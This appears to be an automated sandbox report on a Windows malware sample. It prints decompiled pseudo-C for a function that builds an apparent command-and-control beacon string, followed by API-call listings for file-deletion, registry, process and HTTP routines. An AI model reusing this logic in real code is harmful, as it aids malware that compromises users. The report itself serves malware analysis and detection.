                                                            			E00DD323C(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t107;
				intOrPtr _t111;
				signed int _t115;
				char** _t117;
				int _t120;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t135;
				int _t138;
				intOrPtr _t139;
				int _t142;
				void* _t143;
				void* _t144;
				void* _t154;
				int _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t154 = __edx;
				_t144 = __ecx;
				_t63 = __eax;
				_t143 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0xdda018; // 0x7b557b46
				asm("bswap eax");
				_t65 =  *0xdda014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0xdda010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0xdda00c; // 0x67522d90
				asm("bswap eax");
				_t68 =  *0xdda2d4; // 0x2bed5a8
				_t3 = _t68 + 0xddb622; // 0x74666f73
				_t157 = wsprintfA(_t143, _t3, 3, 0x3d163, _t67, _t66, _t65, _t64,  *0xdda02c,  *0xdda004, _t63);
				_t71 = E00DD4155();
				_t72 =  *0xdda2d4; // 0x2bed5a8
				_t4 = _t72 + 0xddb662; // 0x74707526
				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t75;
				if(_a8 != 0) {
					_t139 =  *0xdda2d4; // 0x2bed5a8
					_t8 = _t139 + 0xddb66d; // 0x732526
					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t142;
				}
				_t76 = E00DD35BC(_t144);
				_t77 =  *0xdda2d4; // 0x2bed5a8
				_t10 = _t77 + 0xddb38a; // 0x6d697426
				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
				_t81 =  *0xdda2d4; // 0x2bed5a8
				_t12 = _t81 + 0xddb7b4; // 0x39c8d5c
				_t180 = _a4 - _t12;
				_t14 = _t81 + 0xddb33b; // 0x74636126
				_t156 = 0 | _t180 == 0x00000000;
				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
				_t85 =  *0xdda31c; // 0x39c95e0
				_t175 = _t174 + 0x1c;
				if(_t85 != 0) {
					_t135 =  *0xdda2d4; // 0x2bed5a8
					_t18 = _t135 + 0xddb8e9; // 0x3d736f26
					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t138;
				}
				_t86 =  *0xdda32c; // 0x39c95b0
				if(_t86 != 0) {
					_t132 =  *0xdda2d4; // 0x2bed5a8
					_t20 = _t132 + 0xddb685; // 0x73797326
					wsprintfA(_t160 + _t143, _t20, _t86);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0xdda37c; // 0x39c9630
				_t88 = E00DD49BA(0xdda00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					HeapFree( *0xdda290, _t167, _t143);
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0xdda290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0xdda290, _t167, _v12);
						goto L28;
					}
					E00DD3D0C(GetTickCount());
					_t95 =  *0xdda37c; // 0x39c9630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0xdda37c; // 0x39c9630
					__imp__(_t99 + 0x40);
					_t101 =  *0xdda37c; // 0x39c9630
					_t163 = E00DD637D(1, _t156, _t143,  *_t101);
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						HeapFree( *0xdda290, _t167, _a8);
						goto L27;
					}
					StrTrimA(_t163, 0xdd92ac);
					_push(_t163);
					_t107 = E00DD7067();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0xdda290, _t167, _t163);
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					_t111 = E00DD5691( *_t168(_a8, _t163), _a8);
					_a4 = _t111;
					if(_t111 == 0) {
						_a20 = 8;
						L23:
						E00DD454A();
						L24:
						HeapFree( *0xdda290, 0, _v8);
						_t167 = 0;
						goto L25;
					}
					_t115 = E00DD656F(_t143, 0xffffffffffffffff, _t163,  &_v16);
					_a20 = _t115;
					if(_t115 == 0) {
						_t171 = _v16;
						_a20 = E00DD211F(_t171, _a4, _a12, _a16);
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E00DD77EC(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t117 = _a12;
							if(_t117 != 0) {
								_t164 =  *_t117;
								_t169 =  *_a16;
								wcstombs( *_t117,  *_t117,  *_a16);
								_t120 = E00DD75F0(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t120;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E00DD77EC(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}


























































                                                            0x00dd323c
                                                            0x00dd323c
                                                            0x00dd323c
                                                            0x00dd3245
                                                            0x00dd324a
                                                            0x00dd3251
                                                            0x00dd3253
                                                            0x00dd3253
                                                            0x00dd3260
                                                            0x00dd326b
                                                            0x00dd326e
                                                            0x00dd3279
                                                            0x00dd327c
                                                            0x00dd3281
                                                            0x00dd3284
                                                            0x00dd3289
                                                            0x00dd328c
                                                            0x00dd3298
                                                            0x00dd32a5
                                                            0x00dd32a7
                                                            0x00dd32ad
                                                            0x00dd32b2
                                                            0x00dd32bd
                                                            0x00dd32bf
                                                            0x00dd32c2
                                                            0x00dd32c8
                                                            0x00dd32ca
                                                            0x00dd32d2
                                                            0x00dd32dd
                                                            0x00dd32df
                                                            0x00dd32e2
                                                            0x00dd32e2
                                                            0x00dd32e4
                                                            0x00dd32eb
                                                            0x00dd32f0
                                                            0x00dd32fd
                                                            0x00dd32ff
                                                            0x00dd3304
                                                            0x00dd330c
                                                            0x00dd330f
                                                            0x00dd3315
                                                            0x00dd3320
                                                            0x00dd3322
                                                            0x00dd3327
                                                            0x00dd332c
                                                            0x00dd332f
                                                            0x00dd3334
                                                            0x00dd333f
                                                            0x00dd3341
                                                            0x00dd3344
                                                            0x00dd3344
                                                            0x00dd3346
                                                            0x00dd334d
                                                            0x00dd3350
                                                            0x00dd3355
                                                            0x00dd335f
                                                            0x00dd3361
                                                            0x00dd3361
                                                            0x00dd3364
                                                            0x00dd3372
                                                            0x00dd3377
                                                            0x00dd337b
                                                            0x00dd337e
                                                            0x00dd3548
                                                            0x00dd3550
                                                            0x00dd355d
                                                            0x00dd3384
                                                            0x00dd3390
                                                            0x00dd3398
                                                            0x00dd339b
                                                            0x00dd3538
                                                            0x00dd3542
                                                            0x00000000
                                                            0x00dd3542
                                                            0x00dd33a7
                                                            0x00dd33ac
                                                            0x00dd33b5
                                                            0x00dd33c6
                                                            0x00dd33ca
                                                            0x00dd33d3
                                                            0x00dd33d9
                                                            0x00dd33e6
                                                            0x00dd33ed
                                                            0x00dd33f6
                                                            0x00dd33fc
                                                            0x00dd3528
                                                            0x00dd3532
                                                            0x00000000
                                                            0x00dd3532
                                                            0x00dd3408
                                                            0x00dd340e
                                                            0x00dd340f
                                                            0x00dd3416
                                                            0x00dd3419
                                                            0x00dd351a
                                                            0x00dd3522
                                                            0x00000000
                                                            0x00dd3522
                                                            0x00dd3422
                                                            0x00dd3428
                                                            0x00dd3431
                                                            0x00dd343a
                                                            0x00dd3445
                                                            0x00dd344c
                                                            0x00dd344f
                                                            0x00dd3560
                                                            0x00dd3502
                                                            0x00dd3502
                                                            0x00dd3507
                                                            0x00dd3512
                                                            0x00dd3518
                                                            0x00000000
                                                            0x00dd3518
                                                            0x00dd3459
                                                            0x00dd3460
                                                            0x00dd3463
                                                            0x00dd3468
                                                            0x00dd3478
                                                            0x00dd347b
                                                            0x00dd3481
                                                            0x00dd3487
                                                            0x00dd348d
                                                            0x00dd3490
                                                            0x00dd3496
                                                            0x00dd3499
                                                            0x00dd349e
                                                            0x00dd34a2
                                                            0x00dd34a2
                                                            0x00dd34ae
                                                            0x00dd34ba
                                                            0x00dd34be
                                                            0x00dd34c0
                                                            0x00dd34c5
                                                            0x00dd34c7
                                                            0x00dd34cc
                                                            0x00dd34d1
                                                            0x00dd34de
                                                            0x00dd34e6
                                                            0x00dd34e9
                                                            0x00dd34e9
                                                            0x00dd34c5
                                                            0x00000000
                                                            0x00dd34b0
                                                            0x00dd34b4
                                                            0x00dd34eb
                                                            0x00dd34ee
                                                            0x00dd34f7
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd34f7
                                                            0x00dd34b6
                                                            0x00000000
                                                            0x00dd34b6
                                                            0x00dd34ae

                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00DD3253
                                                            • wsprintfA.USER32 ref: 00DD32A0
                                                            • wsprintfA.USER32 ref: 00DD32BD
                                                            • wsprintfA.USER32 ref: 00DD32DD
                                                            • wsprintfA.USER32 ref: 00DD32FB
                                                            • wsprintfA.USER32 ref: 00DD331E
                                                            • wsprintfA.USER32 ref: 00DD333F
                                                            • wsprintfA.USER32 ref: 00DD335F
                                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00DD3390
                                                            • GetTickCount.KERNEL32 ref: 00DD33A1
                                                            • RtlEnterCriticalSection.NTDLL(039C95F0), ref: 00DD33B5
                                                            • RtlLeaveCriticalSection.NTDLL(039C95F0), ref: 00DD33D3
                                                              • Part of subcall function 00DD637D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD63A8
                                                              • Part of subcall function 00DD637D: lstrlen.KERNEL32(00000000,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD63B0
                                                              • Part of subcall function 00DD637D: strcpy.NTDLL ref: 00DD63C7
                                                              • Part of subcall function 00DD637D: lstrcat.KERNEL32(00000000,00000000), ref: 00DD63D2
                                                              • Part of subcall function 00DD637D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00DD72E3,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD63EF
                                                            • StrTrimA.SHLWAPI(00000000,00DD92AC,?,039C9630), ref: 00DD3408
                                                              • Part of subcall function 00DD7067: lstrlen.KERNEL32(039C887A,00000000,00000000,00000000,00DD730A,00000000), ref: 00DD7077
                                                              • Part of subcall function 00DD7067: lstrlen.KERNEL32(?), ref: 00DD707F
                                                              • Part of subcall function 00DD7067: lstrcpy.KERNEL32(00000000,039C887A), ref: 00DD7093
                                                              • Part of subcall function 00DD7067: lstrcat.KERNEL32(00000000,?), ref: 00DD709E
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 00DD3428
                                                            • lstrcat.KERNEL32(00000000,?), ref: 00DD343A
                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00DD3440
                                                              • Part of subcall function 00DD5691: lstrlen.KERNEL32(?,00000000,039C9D00,745EC740,00DD291A,039C9F05,00DD5FB9,00DD5FB9,?,00DD5FB9,?,69B25F44,E8FA7DD7,00000000), ref: 00DD5698
                                                              • Part of subcall function 00DD5691: mbstowcs.NTDLL ref: 00DD56C1
                                                              • Part of subcall function 00DD5691: memset.NTDLL ref: 00DD56D3
                                                            • wcstombs.NTDLL ref: 00DD34D1
                                                              • Part of subcall function 00DD211F: SysAllocString.OLEAUT32(00000000), ref: 00DD2160
                                                              • Part of subcall function 00DD77EC: RtlFreeHeap.NTDLL(00000000,00000000,00DD1333,00000000,00000000,?,00000000,?,?,?,?,?,00DD66B0,00000000,?,00000001), ref: 00DD77F8
                                                            • HeapFree.KERNEL32(00000000,?,00000000), ref: 00DD3512
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00DD3522
                                                            • HeapFree.KERNEL32(00000000,00000000,?,039C9630), ref: 00DD3532
                                                            • HeapFree.KERNEL32(00000000,?), ref: 00DD3542
                                                            • HeapFree.KERNEL32(00000000,?), ref: 00DD3550
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                            • String ID: F{U{
                                                            • API String ID: 972889839-3347341033
                                                            • Opcode ID: c1fbd49f6bc6814eb6b84f7788eed741867e7b2dbcde408bb4ba09557e7c5493
                                                            • Instruction ID: 25f5d540ecec94c8a996da7df091dfa8a738f4b22531cca9465d81631be3fa17
                                                            • Opcode Fuzzy Hash: c1fbd49f6bc6814eb6b84f7788eed741867e7b2dbcde408bb4ba09557e7c5493
                                                            • Instruction Fuzzy Hash: 86A15D71501209AFCB11DFA8EC89EAA3BA9FF48314B158067F809C7360D736DA10DBB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04573AA1, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 390memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(?,?,0458C140), ref: 04573B03
                                                            • RtlAllocateHeap.NTDLL(00000000,0458BAA9,?), ref: 04573B9F
                                                            • lstrcpyn.KERNEL32(00000000,?,0458BAA9,?,0458C140), ref: 04573BB4
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,0458C140), ref: 04573BCF
                                                            • StrChrA.SHLWAPI(?,00000020,?,00000000,00000000,?,00000000,?,0458BAA8,?,?,0458C140), ref: 04573CB9
                                                            • StrChrA.SHLWAPI(00000001,00000020,?,0458C140), ref: 04573CCA
                                                            • lstrlen.KERNEL32(00000000,?,0458C140), ref: 04573CDE
                                                            • memmove.NTDLL(0458BAA9,?,00000001,?,0458C140), ref: 04573CEE
                                                            • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,0458BAA8,?,?,0458C140), ref: 04573D1A
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04573D40
                                                            • memcpy.NTDLL(00000000,?,?,?,0458C140), ref: 04573D54
                                                            • memcpy.NTDLL(0458BAA8,?,?,?,0458C140), ref: 04573D74
                                                            • HeapFree.KERNEL32(00000000,0458BAA8,?,?,?,?,?,?,?,?,0458C140), ref: 04573DB0
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04573E76
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 04573EBE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                                                            • String ID: GET $GET $OPTI$OPTI$POST$PUT
                                                            • API String ID: 3227826163-647159250
                                                            • Opcode ID: 744338615e55d941ea665e179d9a7be7a19a78656bf93b9a115699c3956e669c
                                                            • Instruction ID: 83e015e05f9147a6ba99179db7be2304c536cdff6c4c1a9ecc477bfc44926324
                                                            • Opcode Fuzzy Hash: 744338615e55d941ea665e179d9a7be7a19a78656bf93b9a115699c3956e669c
                                                            • Instruction Fuzzy Hash: 0AE15971A00206EFDB14DFA9E884AAA7BB8FF04314F148568F915EB291DB34E954FB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04561000, Relevance: 24.3, APIs: 16, Instructions: 258memorystringfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?), ref: 04561015
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04580C11
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04580C1D
                                                              • Part of subcall function 04580BC5: memset.NTDLL ref: 04580C65
                                                              • Part of subcall function 04580BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04580C80
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(0000002C), ref: 04580CB8
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?), ref: 04580CC0
                                                              • Part of subcall function 04580BC5: memset.NTDLL ref: 04580CE3
                                                              • Part of subcall function 04580BC5: wcscpy.NTDLL ref: 04580CF5
                                                              • Part of subcall function 04580BC5: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 04580D1B
                                                              • Part of subcall function 04580BC5: RtlEnterCriticalSection.NTDLL(?), ref: 04580D50
                                                              • Part of subcall function 04580BC5: RtlLeaveCriticalSection.NTDLL(?), ref: 04580D6C
                                                              • Part of subcall function 04580BC5: FindNextFileW.KERNEL32(?,00000000), ref: 04580D85
                                                              • Part of subcall function 04580BC5: WaitForSingleObject.KERNEL32(00000000), ref: 04580D97
                                                              • Part of subcall function 04580BC5: FindClose.KERNEL32(?), ref: 04580DAC
                                                              • Part of subcall function 04580BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04580DC0
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(0000002C), ref: 04580DE2
                                                            • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 04561071
                                                            • memcpy.NTDLL(00000000,?,00000000), ref: 04561084
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 0456109B
                                                              • Part of subcall function 04580BC5: FindNextFileW.KERNEL32(?,00000000), ref: 04580E58
                                                              • Part of subcall function 04580BC5: WaitForSingleObject.KERNEL32(00000000), ref: 04580E6A
                                                              • Part of subcall function 04580BC5: FindClose.KERNEL32(?), ref: 04580E85
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 045610C6
                                                            • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 045610DE
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04561138
                                                            • lstrlenW.KERNEL32(00000000,?), ref: 0456115B
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0456116D
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 045611E1
                                                            • HeapFree.KERNEL32(00000000,?), ref: 045611F1
                                                              • Part of subcall function 04574B63: lstrlen.KERNEL32(?,770F4620,00000000,?,00000000,04561211,?), ref: 04574B72
                                                              • Part of subcall function 04574B63: mbstowcs.NTDLL ref: 04574B8E
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 0456121A
                                                            • lstrlenW.KERNEL32(0458D8B0,?), ref: 04561294
                                                            • DeleteFileW.KERNEL32(?,?), ref: 045612C2
                                                            • HeapFree.KERNEL32(00000000,?), ref: 045612D0
                                                            • HeapFree.KERNEL32(00000000,?), ref: 045612F1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                                                            • String ID:
                                                            • API String ID: 72361108-0
                                                            • Opcode ID: 92eef9b0fd4137b53472eca777afc7be762558d73f8764e56976971f3042fd13
                                                            • Instruction ID: 5495aff360cc2efa58983b67c9283f72093dda764eb4bf2c3cd5b2e5ab9a172f
                                                            • Opcode Fuzzy Hash: 92eef9b0fd4137b53472eca777afc7be762558d73f8764e56976971f3042fd13
                                                            • Instruction Fuzzy Hash: 9B915D7190021AEFDB10DFA5ECC8DAE7BBCFB49354B045419F505E7292DA38A948EF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045764E2, Relevance: 24.1, APIs: 16, Instructions: 131memoryregistrythreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04576504
                                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 04576521
                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 04576571
                                                            • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0457657B
                                                            • GetLastError.KERNEL32 ref: 04576585
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04576596
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 045765B8
                                                            • HeapFree.KERNEL32(00000000,?), ref: 045765EF
                                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04576603
                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0457660C
                                                            • SuspendThread.KERNEL32(?), ref: 0457661B
                                                            • CreateEventA.KERNEL32(0458C1A8,00000001,00000000), ref: 0457662F
                                                            • SetEvent.KERNEL32(00000000), ref: 0457663C
                                                            • CloseHandle.KERNEL32(00000000), ref: 04576643
                                                            • Sleep.KERNEL32(000001F4), ref: 04576656
                                                            • ResumeThread.KERNEL32(?), ref: 0457667A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                                                            • String ID:
                                                            • API String ID: 1011176505-0
                                                            • Opcode ID: c5ac4b41cb2385b31ee6c313ed130535f3086649f6aea69a31edc636768d8446
                                                            • Instruction ID: 12acd6ef381347fcc5587b8edfbbc97cbca58197e538b524bff2cdb8b3b5739d
                                                            • Opcode Fuzzy Hash: c5ac4b41cb2385b31ee6c313ed130535f3086649f6aea69a31edc636768d8446
                                                            • Instruction Fuzzy Hash: AA414BB2900506EFDB119FA4FC889ADBBB9FB04355B50517DF602B2110DB39AE58FB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04571AF2, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • memset.NTDLL ref: 04571B20
                                                            • StrChrA.SHLWAPI(?,0000000D), ref: 04571B66
                                                            • StrChrA.SHLWAPI(?,0000000A), ref: 04571B73
                                                            • StrChrA.SHLWAPI(?,0000007C), ref: 04571B9A
                                                            • StrTrimA.SHLWAPI(?,0458847C), ref: 04571BAF
                                                            • StrChrA.SHLWAPI(?,0000003D), ref: 04571BB8
                                                            • StrTrimA.SHLWAPI(00000001,0458847C), ref: 04571BCE
                                                            • _strupr.NTDLL ref: 04571BD5
                                                            • StrTrimA.SHLWAPI(?,?), ref: 04571BE2
                                                            • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 04571C2A
                                                            • lstrlen.KERNEL32(?,00000000,?,?,?,00000001,?,00000000,045863D8,00000002,?,?), ref: 04571C49
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                                                            • String ID: $;
                                                            • API String ID: 4019332941-73438061
                                                            • Opcode ID: 99bf14a739c0c007ecd77e91b18f4c70a717ee06374be36b62916c2fdc8144d0
                                                            • Instruction ID: 7caa2e8476433a9021c7907023d8bd8db74ebe5cac48a4447a688003f00076b5
                                                            • Opcode Fuzzy Hash: 99bf14a739c0c007ecd77e91b18f4c70a717ee06374be36b62916c2fdc8144d0
                                                            • Instruction Fuzzy Hash: 2D41C0711047069FD711EF69A844B2ABBECFF58704F08082DF995AB241EF74F9059B62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457A976, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121processstringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.NTDLL ref: 0457A98B
                                                              • Part of subcall function 04574B63: lstrlen.KERNEL32(?,770F4620,00000000,?,00000000,04561211,?), ref: 04574B72
                                                              • Part of subcall function 04574B63: mbstowcs.NTDLL ref: 04574B8E
                                                            • lstrlenW.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 0457A9C4
                                                            • wcstombs.NTDLL ref: 0457A9CE
                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,?,00000000,?), ref: 0457A9FF
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04581B1D), ref: 0457AA2B
                                                            • TerminateProcess.KERNEL32(?,000003E5), ref: 0457AA41
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04581B1D), ref: 0457AA55
                                                            • GetLastError.KERNEL32 ref: 0457AA59
                                                            • GetExitCodeProcess.KERNEL32(?,00000001), ref: 0457AA79
                                                            • CloseHandle.KERNEL32(?), ref: 0457AA88
                                                            • CloseHandle.KERNEL32(?), ref: 0457AA8D
                                                            • GetLastError.KERNEL32 ref: 0457AA91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                                                            • String ID: D
                                                            • API String ID: 2463014471-2746444292
                                                            • Opcode ID: 7d4c0dacbf4c66b2175fb1c8be2bdd19a2eac8700b0d9221901a6d38d370ae22
                                                            • Instruction ID: b8a67f3f17ad72d3416ef41dee979f32605dd490819eab11ec7c1434c4e3b84a
                                                            • Opcode Fuzzy Hash: 7d4c0dacbf4c66b2175fb1c8be2bdd19a2eac8700b0d9221901a6d38d370ae22
                                                            • Instruction Fuzzy Hash: 70413B72D00119FFDF11EFA4ED859AEBBBCFB48344F10407AE501B2101EA356E04AB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045834B3, Relevance: 21.2, APIs: 14, Instructions: 230memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 045768B2: RegQueryValueExA.KERNELBASE(00000000,04575AB0,00000000,04575AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?), ref: 045768EA
                                                              • Part of subcall function 045768B2: RtlAllocateHeap.NTDLL(00000000,?), ref: 045768FE
                                                              • Part of subcall function 045768B2: RegQueryValueExA.ADVAPI32(00000000,04575AB0,00000000,04575AB0,00000000,?,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40), ref: 04576918
                                                              • Part of subcall function 045768B2: RegCloseKey.ADVAPI32(00000000,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40,?,?,?,04575AB0,00000000), ref: 04576942
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,73BCF710,00000000,00000000), ref: 045834FA
                                                            • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 04583518
                                                            • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?,?,?,?,?,?,04572FCF), ref: 04583546
                                                            • HeapFree.KERNEL32(00000000,045863D8,0000002A,00000000,00000000,00000000,00000000,?,00000001,045863D8,00000002,?,?), ref: 045835BA
                                                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0458367D
                                                            • wsprintfA.USER32 ref: 04583698
                                                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,04572FCF), ref: 045836A3
                                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000,?,?,?,?,?,?,?,?,?,04572FCF), ref: 045836BA
                                                            • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000001,045863D8,00000002,?), ref: 045836DC
                                                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 045836F7
